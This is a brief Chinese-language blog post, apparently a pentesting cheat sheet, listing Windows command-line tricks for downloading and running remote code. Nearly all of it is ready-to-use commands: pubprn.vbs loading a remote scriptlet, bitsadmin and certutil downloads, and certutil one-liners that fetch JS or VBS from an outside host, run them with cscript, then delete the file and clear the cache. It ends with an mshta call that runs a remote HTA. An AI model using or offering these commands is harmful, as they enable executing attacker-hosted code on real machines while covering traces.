Some Tricks

发表于 | 分类于

远程执行sct的另一种姿势

1
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd

命令行下载姿势1

1
2
3
bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"

命令行下载姿势2

1
certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt

清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete

命令行执行远程JS

1
certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete

命令行远程执行VBS

1
certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs && cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f http://192.168.254.102:80/abc delete

命令行远程执行HTA

1
mshta http://192.168.254.102/1.hta

------本文结束,感谢阅读------